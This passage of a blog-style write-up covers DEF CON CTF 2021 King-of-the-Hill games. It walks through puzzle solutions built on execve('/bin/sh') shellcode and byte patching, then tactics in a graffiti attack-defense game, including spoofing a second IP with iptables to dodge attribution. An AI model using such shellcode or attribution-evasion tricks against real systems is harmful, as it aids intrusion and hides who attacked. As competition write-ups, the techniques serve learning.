11: 53                      push   rbx
12: 54                      push   rsp
13: 58                      pop    rax
14: b0 3b                   mov    al,0x3b
16: 0f 05                   syscall
</code></pre>

<p>Huh, everything looked normal, though with a closer look, we could see that the address of the string was stored at <code class="language-plaintext highlighter-rouge">rax</code> instead of the supposed <code class="language-plaintext highlighter-rouge">rdi</code> register. Then, combined with the newly appeared blocks that had register names on them, it came to us that we needed to make <code class="language-plaintext highlighter-rouge">rax is rdi</code> so that when the machine was executing <code class="language-plaintext highlighter-rouge">pop rax</code>, it was actually executing <code class="language-plaintext highlighter-rouge">pop rdi</code>.</p>

<p>However, if we first formed <code class="language-plaintext highlighter-rouge">rax is rdi</code> and let the program run, we still would get a segfault. Then we tried a lot of things, like using <code class="language-plaintext highlighter-rouge">rdi is rax</code> instead. One of my teammates finally realized that we might only want the rule to be in effect when we were executing that single instruction <code class="language-plaintext highlighter-rouge">pop rax</code>, so he pushed <code class="language-plaintext highlighter-rouge">cpu is run</code> vertically, let it run to address <samp>0x13</samp>, stopped the run by splitting the blocks, went to the right part and formed <code class="language-plaintext highlighter-rouge">rdi is rax</code>, came back and continued the run for 1 tick, and then disabled that rule, came back to run the last <code class="language-plaintext highlighter-rouge">syscall</code>, and finally we got it working.</p>

<h3 id="ten-thousands-steps">Ten Thousands Steps</h3>

<p>Well, the title said ten thousands steps, but if you actually used more than 1000 steps, you would get a screen saying you have run out of time.</p>

<p>We were again locked up in a jail, made out of ice blocks this time. However, there’s a lock block and <code class="language-plaintext highlighter-rouge">lock is push</code> inside the jail, so we could simply push from left to right to enable that rule and walk out of the jail. However, if we just went straight to <code class="language-plaintext highlighter-rouge">cpu is run</code>, the processor would inevitably stumble onto an ice block and stops running (throwing a segfault).</p>

<p>With a closer look at the exiting shellcode on the board, I realized we actually had every instruction we needed on the board, but they were just scattered around the memory. Looking at what we had on the board, I came up with a solution:</p>

<ol>
  <li>Enable <code class="language-plaintext highlighter-rouge">lock is push</code> to escape the jail.</li>
  <li>Push <code class="language-plaintext highlighter-rouge">cpu</code> <code class="language-plaintext highlighter-rouge">is</code> <code class="language-plaintext highlighter-rouge">run</code> all into the jail so that it can form <code class="language-plaintext highlighter-rouge">cpu is push</code> horizontally and <code class="language-plaintext highlighter-rouge">cpu is run</code> vertically at the same time. Notice that since <code class="language-plaintext highlighter-rouge">push</code> is at the right most edge of the board, it is impossible to push it out.</li>
  <li>Execute the following instructions one by one, by pushing the processor block to the start of that instruction, go back into the jail to enable <code class="language-plaintext highlighter-rouge">cpu is run</code>, and immediately disable it so the machine will run exactly one instruction. Go back to push the processor block to the head of the next instruction we want to execute, and repeat the process.
    <ol>
      <li><code class="language-plaintext highlighter-rouge">48 83 c4 2a</code> (<code class="language-plaintext highlighter-rouge">add rsp,0x2a</code>) to set up the stack.</li>
      <li><code class="language-plaintext highlighter-rouge">48 bf 2f 62 69 6e 2f 2f 73 68</code> (<code class="language-plaintext highlighter-rouge">movabs rdi,0x68732f2f6e69622f</code>) to store the string into <code class="language-plaintext highlighter-rouge">rdi</code>.</li>
      <li><code class="language-plaintext highlighter-rouge">57</code> (<code class="language-plaintext highlighter-rouge">push rdi</code>) to push the string onto the stack.</li>
      <li><code class="language-plaintext highlighter-rouge">54</code> (<code class="language-plaintext highlighter-rouge">push rsp</code>) to store the string address onto the stack.</li>
      <li><code class="language-plaintext highlighter-rouge">5f</code> (<code class="language-plaintext highlighter-rouge">pop rdi</code>) to pop the string address back into <code class="language-plaintext highlighter-rouge">rdi</code>.</li>
      <li><code class="language-plaintext highlighter-rouge">6a 3b</code> (<code class="language-plaintext highlighter-rouge">push 0x3b</code>) to push the syscall number onto the stack.</li>
      <li><code class="language-plaintext highlighter-rouge">58</code> (<code class="language-plaintext highlighter-rouge">pop rax</code>) to pop the syscall number back into <code class="language-plaintext highlighter-rouge">rax</code>.</li>
      <li>……</li>
    </ol>
  </li>
</ol>

<p>Wait a minute, where’s the syscall instruction? Then my teammate hinted me, it’s actually hidden under an ice block. So a look at the game level file, it really was hidden under the bottom line of ice cubes. This meant that we would have to change our strategy up a bit.</p>

<p>So my solution was, once we escaped the jail, we could push <code class="language-plaintext highlighter-rouge">lock</code> text block all the way down to the left-bottom side, and use the <code class="language-plaintext highlighter-rouge">is</code> block out there to form <code class="language-plaintext highlighter-rouge">ice is lock</code> so all the ice blocks will turn into lock blocks. Then, pushing the <code class="language-plaintext highlighter-rouge">lock</code> text block all the way back to form <code class="language-plaintext highlighter-rouge">lock</code> is push, so we could push away the jail wall and reveal the syscall instruction bytes. Then we could continue our plan from step 2.</p>

<p>In the end, we just needed to push the processor block to the revealed <code class="language-plaintext highlighter-rouge">0f 05</code> (<code class="language-plaintext highlighter-rouge">syscall</code>) and let the machine run one last time. In the end it took about 750 steps for me to beat this level by hand.</p>

<h3 id="the-elegant-mantis">The Elegant Mantis</h3>

<p>This level really juiced my brain. The two blocks with the “recycle” symbol drawn on them would flip the memory in respect to the game board when the player stepped on them. The left one would flip the memory horizontally (the center row wouldn’t change); the right one would flip vertically (the center column wouldn’t change). Therefore, we had four potential shellcodes: one original, one flipped horizontally, one flipped vertically, and one flipped diagonally.</p>

<p>I didn’t solve this level, so I will skip what I tried during the game and talk about how my teammate solved it.</p>

<p>Let’s first analyze the original shellcode:</p>

<pre><code class="language-asm">0:  be 16 00 00 00          mov    esi,0x16
5:  bb 00 00 00 00          mov    ebx,0x0
a:  eb 05                   jmp    0x11
c:  01 db                   add    ebx,ebx
e:  83 c6 01                add    esi,0x1
11: 83 fe 30                cmp    esi,0x30
14: 76 f6                   jbe    0xc
16: 83 ec 90                sub    esp,0xffffff90
19: 08 53 76                or     BYTE PTR [ebx+0x76],dl
1c: f0 83 c4 12             lock add esp,0x12
20: 89 c7                   mov    edi,eax
22: 01 d8                   add    eax,ebx
24: e8 22 5a 55 90          call   0x90555a4b
29: 00 31                   add    BYTE PTR [ecx],dh
2b: c0 81 ea 18 21 4a 33    rol    BYTE PTR [ecx+0x4a2118ea],0x33
32: eb 0d                   jmp    0x41
34: 85 c0                   test   eax,eax
36: 54                      push   esp
37: 83 c4 21                add    esp,0x21
3a: 39 cb                   cmp    ebx,ecx
3c: 75 e8                   jne    0x26
3e: 5d                      pop    ebp
3f: 58                      pop    eax
40: 76 fe                   jbe    0x40
42: 01 db                   add    ebx,ebx
44: 83 ec 01                sub    esp,0x1
47: 01 fc                   add    esp,edi
49: 41                      inc    ecx
4a: 41                      inc    ecx
4b: b8 10 00 00 00          mov    eax,0x10
50: bb 2f 62 69 6e          mov    ebx,0x6e69622f
55: 89 18                   mov    DWORD PTR [eax],ebx
57: bb 2f 73 68 00          mov    ebx,0x68732f
5c: 89 58 04                mov    DWORD PTR [eax+0x4],ebx
5f: 89 c3                   mov    ebx,eax
61: 31 c9                   xor    ecx,ecx
63: 29 d2                   sub    edx,edx
65: b0 0b                   mov    al,0xb
67: cd 80                   int    0x80
</code></pre>

<p>If we just let this shellcode run, the machine would eventually throw a segfault at address <samp>0x24</samp>, because the calling address was out of bounds. Taking a closer look at the end of the program, from address <samp>0x4b</samp> to <samp>0x67</samp>, we saw it actually set up the register and memory appropriately. That meant we could clear this level if we could let the program counter somehow reach there.</p>

<p>Therefore, starting from the very beginning, there were four actions we could do at every tick of the game: either to run the CPU, or flip the memory horizontally, or flip the memory vertically, or stop the CPU from running. We had a search algorithm to help us explore all different paths to take, via the help of <em>unicorn</em>, to decide whether to continue searching down the path or stop because of a segfault.</p>

<p>Finally we were able to find a path of shellcode that led to the desired instruction address mentioned above. Converting that to the list of movements in the game, and we were done with the level.</p>

<h3 id="consensual-hallucination">(Consensual) Hallucination</h3>

<p>The shellcode in this level was just an infinite loop and contained no actual string of “/bin/bash” or any sort, so we could ignore it. Looking at the board, we had <code class="language-plaintext highlighter-rouge">bug is bash</code>, which meant that we could pass this level if we were able to touch the bug icon at the upper-right corner of the game.</p>

<p>This was yet another core mechanism in <em>Baba is You</em>, and since this time the shellcode was not important anymore, it was truly a game level. Not much to talk about then, we played it manually and found a solution:</p>

<ol>
  <li>Utilizing <code class="language-plaintext highlighter-rouge">lock bind disk</code>, we can push the floppy disk to the right side of the virus wall, while keeping the lock on the left side.</li>
  <li>Use the floppy disk as a hook to get <code class="language-plaintext highlighter-rouge">cpu</code> <code class="language-plaintext highlighter-rouge">is</code> <code class="language-plaintext highlighter-rouge">run</code> back to the left side of the virus wall.</li>
  <li>Use the <code class="language-plaintext highlighter-rouge">bind</code> mechanism to put the floppy disk on the bug icon and make it stay there by breaking <code class="language-plaintext highlighter-rouge">lock bind disk</code>.</li>
  <li>Line up <code class="language-plaintext highlighter-rouge">disk</code> <code class="language-plaintext highlighter-rouge">is</code> at the bottom in front of the virus wall, and put all the remaining blocks to the left of them.</li>
  <li>Push from left to right so the blocks pass through the virus wall and connect the <code class="language-plaintext highlighter-rouge">zero</code> text block on the right hand side.</li>
</ol>

<p>This would form a new rule <code class="language-plaintext highlighter-rouge">disk is zero</code> so the floppy disk block turned into Zero. Since the floppy disk was on the bug icon, the Zero was then on the bug so we successfully passed this level.</p>

<h3 id="upwind">UpWind</h3>

<p>A lot of new mechanisms in this level.</p>

<p>There was a new portal-like block, which corresponded to the <code class="language-plaintext highlighter-rouge">nrg</code> text block (although I have no idea what nrg means) if <code class="language-plaintext highlighter-rouge">nrg is edit</code> was in effect and the player stood on one of the portal-like blocks, a pop-up would appear and the game would allow you to input a hex value. The value would then be written into that memory.</p>

<p>And there was a new “fan” mechanism, where if the <code class="language-plaintext highlighter-rouge">fan is wind</code> was in effect, all pushable blocks on the same row as the fan would all move left for one block, if possible.</p>

<p>We tried a lot of things and then had some basic understandings:</p>

<ul>
  <li>We had to go to the bottom of the level and trigger <code class="language-plaintext highlighter-rouge">cpu is run</code>, however</li>
  <li>It was impossible to bring the processor into the wind tunnel because it would stick at the end and not allow us to pass through it, and</li>
  <li>It was also impossible to use the processor at the upper part of the level, because there weren’t enough portals for us to input a valid shellcode, and we couldn’t even use <code class="language-plaintext highlighter-rouge">jmp</code> cause that requireed two bytes, but</li>
  <li>there was <code class="language-plaintext highlighter-rouge">nrg</code> text block at the bottom of the level, so we could turn <code class="language-plaintext highlighter-rouge">nrg</code> into a CPU.</li>
</ul>

<p>So our idea was to push all the portal blocks into the wind tunnel, input a shellcode using the edit function, and leave the leftmost one untouched so that we can turn it into a CPU later.</p>

<p>However, we ignored one of the largest problems: there’s a wind blowing in the tunnel and it would blow the CPU to the left one block each tick. Quickly, we came up with two potential solutions for this:</p>

<ol>
  <li>We write shellcode such that even if the processor was blown back by one block, it would still run without issues. That meant the ending byte of the previous instruction would be the start of the next instruction.</li>
  <li>We write shellcode in reverse from right to left, so the wind would help us blow the CPU to the correct position. Since we could control when the CPU runs, we could execute one instruction when we saw the CPU reached a certain position, and then to stop the execution, and wait until it reaches the next instruction on the left.</li>
</ol>

<p>The first one required some real hardcore shellcode technique, and the second one required precision timing, both were not easy to do. Therefore, we splitted into two teams, one trying the first solution and another trying the second. Eventually the first team had their answers out, and I had no idea how they did it.</p>

<h3 id="code-choreography">Code Choreography</h3>

<p>This level was very similar to level 5 <em>Ten Thousands Steps</em>.</p>

<p>A closer look at the existing shellcode on the board, we realized that we had everything except for <code class="language-plaintext highlighter-rouge">cd 80</code> (<code class="language-plaintext highlighter-rouge">int 0x80</code>). There was <code class="language-plaintext highlighter-rouge">cd 81</code> already on the board, so all we needed to do is to turn that <code class="language-plaintext highlighter-rouge">81</code> into <code class="language-plaintext highlighter-rouge">80</code>, the question was, how?</p>

<p>We disassembled the entire memory at each offset and tried to find a combination of these that may work:</p>

<p>We first took a look at address <samp>0xd1</samp>, which was <code class="language-plaintext highlighter-rouge">dec DWORD PTR [ecx+0xc1]</code>, so we thought that we have to somehow put <code class="language-plaintext highlighter-rouge">0x32</code> into <code class="language-plaintext highlighter-rouge">ecx</code> such that they sum up to be <samp>0xf3</samp>, which was the memory address of that byte <code class="language-plaintext highlighter-rouge">81</code> we wanted to decrease. There were <code class="language-plaintext highlighter-rouge">inc eax</code> and <code class="language-plaintext highlighter-rouge">mov ecx, eax</code> on the board, so my teammate wrote a script that could automatically repeat the process of controlling the character to push the processor to one location, come back and execute that instruction. However, this quickly exceeded the 1000 steps limit, so we had to look for something else.</p>

<p>We then turned our eyes to the other <code class="language-plaintext highlighter-rouge">dec</code> on the board at address <samp>0x9e</samp>. Immediately we saw <code class="language-plaintext highlighter-rouge">mov bl, BYTE PTR [eax]</code> and <code class="language-plaintext highlighter-rouge">mov BYTE PTR [eax], bl</code> around it. After more digging, we found another really interesting instruction <code class="language-plaintext highlighter-rouge">or eax, DWORD PTR [eax+0x40]</code> at address <samp>0xec</samp>. With some brute-forcing, we found that there’s an instruction <code class="language-plaintext highlighter-rouge">mov al, 0x61</code>, and at exactly address <code class="language-plaintext highlighter-rouge">0xa1</code> we had a value <code class="language-plaintext highlighter-rouge">0x90</code>. ORing <code class="language-plaintext highlighter-rouge">0x90</code> with <code class="language-plaintext highlighter-rouge">0x61</code> we get <code class="language-plaintext highlighter-rouge">0xf1</code>. Then all we need to do is to <code class="language-plaintext highlighter-rouge">add eax</code> twice, and viola, we find a way to decrease the value at <samp>0xf3</samp>.</p>

<p>Together the chain to decrease the value looked like this:</p>

<pre><code class="language-asm">e6:   b0 61                   mov    al, 0x61
ec:   0b 40 40                or     eax, DWORD PTR [eax+0x40]
ed:   40                      inc    eax
ee:   40                      inc    eax
9c:   8a 18                   mov    bl, BYTE PTR [eax]
9e:   4b                      dec    ebx
9f:   88 18                   mov    BYTE PTR [eax], bl
</code></pre>

<p>Then all that’s left to do was to build the remaining instructions.</p>

<h3 id="netmaze">NetMaze</h3>

<p>Really the simplest non-gaming level here. All I did was writing a DFS to walk randomly, and before long I found a path to walk from the top-left to the bottom-right corner of the maze.</p>

<p>The only thing was that, I realized that the console output is not consistent. Sometimes even if the game displays the segfault screen, the console may not output a line saying segfault. So I patched the source script a bit so the output is consistent with the actual state.</p>

<h3 id="bub-and-bob">Bub and Bob</h3>

<p>Another pure game level. Our solution was something like this:</p>

<ol>
  <li>Fall from the left and push <code class="language-plaintext highlighter-rouge">ball is stop</code> all the way to the right so that <code class="language-plaintext highlighter-rouge">bub is stop</code> extends out.</li>
  <li>Ride the bubble back to the top.</li>
  <li>Fall from the right and bring <code class="language-plaintext highlighter-rouge">bub</code> down.</li>
  <li>Repeat 2 and 3 and bring <code class="language-plaintext highlighter-rouge">is</code> down.</li>
  <li>Form <code class="language-plaintext highlighter-rouge">bub is you</code> horizontally so you can control the little green dragon (called bub). At the same time break <code class="language-plaintext highlighter-rouge">zero is you</code>.</li>
  <li>Move bub to the middle of the screen and push up the middle <code class="language-plaintext highlighter-rouge">is</code> so <code class="language-plaintext highlighter-rouge">cpu is run</code> is in effect.</li>
  <li>Push <code class="language-plaintext highlighter-rouge">ball is</code> back out from right to left, and push them from bottom to the top of the screen.</li>
  <li>Prepare <code class="language-plaintext highlighter-rouge">ball is</code> at the right of <code class="language-plaintext highlighter-rouge">cpu is x64</code>, but don’t connect them yet.</li>
  <li>At the right timing, connect <code class="language-plaintext highlighter-rouge">ball is cpu</code> and move straight to the start of the shellcode (starting at <code class="language-plaintext highlighter-rouge">83</code>). Once the bubble is produced it will turn into the CPU and start running.</li>
</ol>

<p>Let it run to the end and we’re done. Unfortunately at the exact moment we solved this level, the server is down, and that marked the end of day 1.</p>

<p>Here’s the solutions to all 15 levels: <a href="https://www.youtube.com/watch?v=dQw4w9WgXcQ" target="_blank" onclick="alert('sorry bout that')">Zero is You | 15 solutions - YouTube</a>.</p>

<h2 id="optimization">Optimization</h2>

<p>While a bunch of people were trying to solve the puzzle, another group of our KoH players was doing their best to try to optimize the existing solutions. Other than trying to optimize by hand, they wrote a fuzzing tool to randomly (maybe with a heuristic) delete a part out of the solution or replace a part with a smaller part.</p>

<p>With their effort, we successfully shrunk many of our past solutions. However, with the game scoring method, every 5 moves we saved only would give us 1 point. That being said, this fuzzing method made its work on the final day……</p>

<hr />

<p>Overall, we didn’t do well in the first day. Everyone was so good at playing games and we just weren’t fast enough. We were able to get to the fifth place when the game ends, but the way the KoH score works means that all other teams are so ahead of us. We got to keep up in the following days!</p>

<h1 id="www">www</h1>

<p><img src="/assets/images/defcon-ctf-2021/www-score.png" alt="www-score" /></p>

<p>This King of the Hill game combined Attack/Defense, Penetration Testing, and maybe even Web altogether. A really messy experience, but in a fun way.</p>

<h2 id="the-rule">The Rule</h2>

<p>The rule was simple: at each round, each team could use a <code class="language-plaintext highlighter-rouge">flag</code> string to exchange for a <code class="language-plaintext highlighter-rouge">graffiti</code> string. The <code class="language-plaintext highlighter-rouge">graffiti</code> string then could be put onto other team’s walls. Each team could get 1 point if they put a <code class="language-plaintext highlighter-rouge">graffiti</code> string onto some other team’s <code class="language-plaintext highlighter-rouge">wall</code>.</p>

<p>The twist was, if a team could figure out which team put a <code class="language-plaintext highlighter-rouge">graffiti</code> on their wall, and their team’s real <code class="language-plaintext highlighter-rouge">ip</code> , they could accuse the team for vandalizing. If the accusation was successful, not only that 1 point that team got for putting up the <code class="language-plaintext highlighter-rouge">graffiti</code> would be gone, they would also be deducted 4 points for vandalizing (and being spotted).</p>

<p>There were two APIs on each team’s server:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">/graffiti_store</code>, using which we could exchange a <code class="language-plaintext highlighter-rouge">flag</code> string for a <code class="language-plaintext highlighter-rouge">graffiti</code> string.</li>
  <li><code class="language-plaintext highlighter-rouge">/accuse</code>, which could be used to report a <code class="language-plaintext highlighter-rouge">graffiti</code> and <code class="language-plaintext highlighter-rouge">ip</code>.</li>
</ul>

<p>And each team would have a game box that needs to be ssh’d in. Within the game server, the port <code class="language-plaintext highlighter-rouge">1337</code> of each team’s box was the <code class="language-plaintext highlighter-rouge">wall</code>. Connecting to it, a team could spray their graffiti onto others’ walls.</p>

<p>There were two more rules for the fairness and effectiveness of the game:</p>

<ul>
  <li>Teams could accuse retrospectively up to 6 rounds back in the past.</li>
  <li>A team only had one chance to accuse a certain graffiti.</li>
  <li>A team had to pass services availability check each round, otherwise 15 points would be deducted that round.</li>
</ul>

<h2 id="the-observation">The Observation</h2>

<p>Few thoughts and observations we had after we read the rules, logged onto our game box, and tried to manually spray graffiti onto other teams’ walls and accuse other team’s graffiti.</p>

<ol>
  <li>We have the IP address <code class="language-plaintext highlighter-rouge">13.37.228.64</code>, and other teams are scattered around in <code class="language-plaintext highlighter-rouge">13.37.xx.64</code>. This <code class="language-plaintext highlighter-rouge">xx</code> did not correspond to the team ID, therefore a scan of the subnet is needed to find out other teams’ machines. However, when accusing, you only need to report the IP of each team’s box inside the network, not the IP that each team has that contains their team ID (i.e. not <code class="language-plaintext highlighter-rouge">10.13.37.xx</code>).</li>
  <li>There’s a folder in the game box that includes a <code class="language-plaintext highlighter-rouge">flag</code> file and a bunch of pcaps. The <code class="language-plaintext highlighter-rouge">flag</code> content will change every round.</li>
  <li>The IP address that we used to spray graffiti (send TCP connection with) is recorded along with the graffiti string itself. This means that if we were to simply use our real IP address to spray graffiti, and other teams had a automatic accusing system, then for sure we are going to get our points deducted.</li>
  <li>From 2, it means it definitely was a dominated strategy to spray graffiti with a team’s real IP. Therefore, there must be someway to hide a team’s real IP. Combining this fact with the challenge’s description, and a later hint, there’s definitely some machines out there in the game network, over which we could take control.</li>
  <li>Furthermore, there must be other flags out there in these pwnable servers that we could use to buy graffiti with. This is also hinted in the rules of the game.</li>
  <li>Continuing 4, there must be a way to spot the real IP of the vandalizing team, even if they used a jump/zombie server to spray graffiti. In other words, correspond jump/zombie servers’ IPs back to the real IP the team had, assuming each jump server is used only by one team.</li>
</ol>

<p>Even though we knew that it is not a good strategy to spray graffiti with our real IP, before anyone had time to write an auto accusing script, we had some chance to get points, before we successfully pwned a service. We could always turn this off if we started to see our points were deducted.</p>

<p>Quickly, I started writing the script to automatically acquire the <code class="language-plaintext highlighter-rouge">flag</code> string, exchange it for a <code class="language-plaintext highlighter-rouge">graffiti</code> and spray it onto every other teams’ walls. A few annoying things we realized once we started:</p>

<ul>
  <li>The graffiti exchange endpoint is outside the game server, so I had to port forward it using SSH.</li>
  <li>The SSH server has a really short <code class="language-plaintext highlighter-rouge">ClientAliveInterval</code>, so we had to manually adjust the <code class="language-plaintext highlighter-rouge">ServerAliveInterval</code> from our SSH Client.</li>
  <li>There’s a maximum connection limit for the SSH port. So one of us had to do a proxy and let everyone else connect to it via that.</li>
</ul>

<p>While I was writing that, one of my teammates was writing an accusing script. Other members of KoH were then scanning the subnet and trying to find other machines that we could take over.</p>

<h2 id="the-turnabout">The Turnabout</h2>

<p>While my spraying script was running, some of my teammates realized a interesting thing: If you used a <code class="language-plaintext highlighter-rouge">flag</code> string from a past round to exchange for a graffiti this round, you would get a completely new graffiti without error messages. Since in the rule it clearly says that both the <code class="language-plaintext highlighter-rouge">flag</code> and <code class="language-plaintext highlighter-rouge">graffiti</code> lasts for only one round, I thought it may be just a bug, and you couldn’t really get a point using that <code class="language-plaintext highlighter-rouge">graffiti</code> string exchanged from an expired <code class="language-plaintext highlighter-rouge">flag</code>.</p>

<p>Nonetheless, there were no downsides to collect all the past <code class="language-plaintext highlighter-rouge">flag</code>s, so I quickly added more code to my script, so it would collect the current flag and save it along with all the past ones. At every new round, the script would exchange all the saved flags into graffiti strings and spray them onto every other teams’ walls.</p>

<p>This completely changed the game. It was actually counted as a successful spray, in fact, to spray graffiti exchanged with a flag from past rounds. This meant for anyone that knows this bug, their scores could increase linearly each round: Assuming a team has \(c\) “flag sources” (one plus how many machines the team took over), and that they had been collecting flags for \(n\) rounds, then they could get \(c\cdot n\) points in that round, and in total their points would be on the magnitude of \(\Theta(c\cdot n^2)\).</p>

<p>Even without a second machine, we could see our points grow faster than ever. In the case where there were no further progress on pwning other machines, this is the only hope we have.</p>

<h3 id="the-smoke">The Smoke</h3>

<p>During this time, we kinda worried (and almost certain) that some other team have an auto-accusing script running, and we would get more points deducted if we were to spray more graffiti. Therefore, we wrote a “smoking” machine, basically just to randomly generate hex-value strings that looks like <code class="language-plaintext highlighter-rouge">graffiti</code> strings, but in fact were just counterfeits, to spray onto other teams’ walls.</p>

<p>Doing this, the real <code class="language-plaintext highlighter-rouge">graffiti</code> string would be hidden within a pool of fake ones. We thought that teams with a not good enough script would have a hard time accusing, because there were to many accusations they had to make. This should also increase the difficulty of analyzing our behaviors.</p>

<p>Or at least that’s the hope. As for weather it had any effect or not, we didn’t know.</p>

<h3 id="the-fake-ip">The Fake IP</h3>

<p>Spoiler alert: till the end of the game, we weren’t able to find or pwn any other services. However, that doesn’t mean we didn’t get our own fake IP to spray graffiti with.</p>

<p>@cbmixx realized that, since we had root privileges on our own machine, it was possible to give ourselves another IP within a subnet that we had control over with.</p>

<blockquote>
  <p>I don’t quite remember what exact prefix we had control with, might be /26 or something.</p>
</blockquote>

<p>After some trials, we were able to assign our machine a new IP address <code class="language-plaintext highlighter-rouge">13.37.228.65</code> (and later <code class="language-plaintext highlighter-rouge">13.37.228.66</code>). Adding a rule to iptables, all our outgoing traffic to port <code class="language-plaintext highlighter-rouge">1337</code> of other teams’ machines were all going through the new IP address. For teams with a automated accusing script, this should prevent them from accusing us for a long time.</p>

<p>However, one big downside of this was that, if any team were to analyze the graffiti logs manually, they would soon discover what’s going on and correspond our fake IP back to the real IP, because they share the same prefix. Nonetheless, this was the best we could do.</p>

<h2 id="the-accusation">The Accusation</h2>

<p>Our connection to the game VPN is shut off by the admin, said we had too many traffic going through the network and we were DOSing the server. After spending sometime figuring out where the traffic was coming from, we realized that we had our accusing script acting way to aggressive, so we had to take that down for a moment.</p>

<p>@mcfx moved the accusing script locally and only periodically pulled data from the remote server. He then analyzed data all by himself, and write a script to automatically correspond jump server IPs back to the real IP. He was able to figure out all the big player’s real IP and their jump servers’. I believe he was the sole reason why PPP and Katzebin lost so many points.</p>

<p>There were many ways to find the real IP behind the jump server, although I’m not sure what exact method @mcfx used. Nonetheless, I’ll talk about what my idea was:</p>

<p>Assuming we had an <code class="language-plaintext highlighter-rouge">IP</code> that we didn’t know the real IP behind it, we could set up a list of all possible real IPs behind it. For the first time we met this <code class="language-plaintext highlighter-rouge">IP</code>, the list is just all other teams’ IP addresses. Then, for all the <code class="language-plaintext highlighter-rouge">graffiti</code> that were sent out using that <code class="language-plaintext highlighter-rouge">IP</code>, we could try to accuse that <code class="language-plaintext highlighter-rouge">graffiti</code> with one of the IP address that’s still on the list. Since the <code class="language-plaintext highlighter-rouge">/accuse</code> endpoint told us we didn’t successfully accuse, we cross out that IP from the list, until we met with one IP that we accused successfully.</p>

<p>During the game, I had a real evil thought: How about we tell other teams what is the real IP address behind each jump server, so that they could help with accusing the big teams and taking them down. Maybe I could publicize it in the Discord chat or spray it onto other teams’ walls. However, that would probably be violating some rules, or at least not so moral, and didn’t sound like a correct thing to do, so we didn’t do it.</p>

<h3 id="the-avoidance">The Avoidance</h3>

<p>After some period of time, we could see our point no longer grew that rapidly, so it must be some teams starting to find out our fake IP address and accusing us with the real ones. Utilizing the rules that you can only accuse graffiti that were sprayed on your team’s wall, we had two ideas:</p>

<ol>
  <li>
    <p>Spray randomly to only a portion to all the teams and record who did we spray. We can then check our scores to find out who should we stop spraying.</p>
  </li>
  <li>
    <p>Only stop spraying the big players we found, since they have the largest chance of finding out our real IP as well.</p>
  </li>
</ol>

<p>The first one seemed to be a good idea, but really hard to implement. First of all, the scores are lagging behind, so in reality we would have to wait for a lot of rounds to get the data we need. Furthermore, the data is really noisy, and we have to do this for many rounds to be sure. Therefore, I didn’t go with it.</p>

<p>Instead, for the second idea, since we already identified some of the big players out there, we could just stop spraying them and quickly check if we indeed get more points. We picked out two largest teams out there (who owned the most jump servers), who had real IP <code class="language-plaintext highlighter-rouge">13.37.109.64</code> and <code class="language-plaintext highlighter-rouge">13.37.238.64</code>, and stopped spraying them.</p>

<p>At first it didn’t seem to work, but after the scoreboard kept up with the round where we implemented this idea, we saw our score increased drastically, and the score we gain each round then surpassed PPP and Katzebin.</p>

<h3 id="the-countermeasure">The Countermeasure</h3>

<p>After a while, we realized that the big teams stopped attacking us as well. Probably due to the same thought process as above. However, there is actually a way to counter that, let’s first review what we knew:</p>

<p>In order to successful accuse some team, we needed to present an (<code class="language-plaintext highlighter-rouge">IP</code>, <code class="language-plaintext highlighter-rouge">graffiti</code>) pair, with restriction being that</p>

<ol>
  <li>We knew the real <code class="language-plaintext highlighter-rouge">IP</code> address of the <em>WWW</em> game box, which the team that exchanged this <code class="language-plaintext highlighter-rouge">graffiti</code> owned.</li>
  <li>That <code class="language-plaintext highlighter-rouge">graffiti</code> was sprayed onto our wall.</li>
</ol>

<p>If people stop spraying us, then clearly we couldn’t do anything about it, right?</p>

<p>Notice one thing, that we could see other teams’ wall as well. Meaning even if at some round some team doesn’t spray us, they would spray someone else and their graffiti would be left there for anyone to see.</p>

<p>Then, one of our team members had a crazy thought: we could take the graffiti that the team sprayed on other teams’ walls and spray them onto ours wall. This idea had two implications:</p>

<ol>
  <li>This must be counted a point for that team, because the system had no way to tell weather we sprayed it onto our own wall or the other team took control over our machine and sprayed a graffiti onto ours.</li>
  <li>Since 1 must work, then we definitely can successfully accuse that team for spraying, because it satisfies the above 2 restrictions.</li>
</ol>

<p>Quickly we tried out if this really works, and it did. Hence, for teams that don’t want to get accused, the best thing for them to do is to probably stop spraying. At the final hours of the game, both PPP and Katzebin stopped spraying, and we were the only team who still has a growing score.</p>

<h2 id="the-reset">The Reset</h2>

<p>At one point of the game, we suddenly lost all connections to the game box. At first we thought it was just a connection issue, so we waited a bit, but it didn’t come back on its own. I started to panic, because all of the saved flags are stored on the server, and we had to at least get the file back before resetting the machine. So we sent out a ticket, hoping that the admin could help us sort out the issue.</p>

<p>However, waiting for almost 10 minutes after we lost connection to the server, there were still no progress on the matter, and we can’t afford to lose more points. We have accumulated about 40 flags at this time of the game, and a reset means we would have to start from zero.</p>

<p>Just when we were stressed about whether to wait for admin’s support or just reset the machine, one of the team members found the content of the flags file in his terminal history, a <code class="language-plaintext highlighter-rouge">cat /flags</code> command that might just save us. After checking the content, we confirmed that it’s a relative recent history, which contains enough flags for us to get back to where we were. We backed up that content and immediately reset our machine.</p>

<p>But that’s not the end.</p>

<h3 id="the-second-reset">The Second Reset</h3>

<p>When we first lost connections to the server, we were kind of suspecting that another team hacked our box, but we didn’t know. We knew that there were SSH weak password issues, but we weren’t able to log into anyone’s machine using that weak password, and we had changed our SSH password from the beginning.</p>

<p>However, not long after we reset our machine, suddenly we were kicked out from the server again. This time, it’s not that we cannot connect to the SSH port, but SSH server kept telling us the password is wrong. We were sure that we were getting hacked and that was really scary.</p>

<p>Quickly we reset our machine again, and on the moment we log in, not only we changed all the users’ passwords, including the main one, we also disabled the apache server. Although this might make us fail the service availability check, but it’s only 15 points per round, and the amount of scores we get is much more than that.</p>

<p>After that, our connections are fine, so that’s the end of the this brief interlude.</p>

<h2 id="the-end">The End</h2>

<p>An hour before day two ended, almost everyone’s score stopped increasing, except for ours. At the end, we even climbed to the second place, only 2000 scores left with PPP. I would say that’s impressive considering we didn’t pwn any server at all.</p>

<p>There’s also one point in the game where nobody scored for some reason. I think that’s because the <code class="language-plaintext highlighter-rouge">/graffiti_store</code> endpoint is down, but I don’t think it was down for that much time. It remains to be a mystery then.</p>

<h1 id="shooow-your-shell">shooow-your-shell</h1>

<p><img src="/assets/images/defcon-ctf-2021/shooow-your-shell-score.png" alt="shooow-your-shell-score" /></p>

<p>After day two ended, a KoH homework was released. The name was <code class="language-plaintext highlighter-rouge">shooow-your-shell</code> and obviously from the name it was yet another shellcode challenge. Nine hours before day three started, we began to work on this challenge.</p>

<p>Looking at the Python code and disassembled runner, we understood how the game worked:</p>
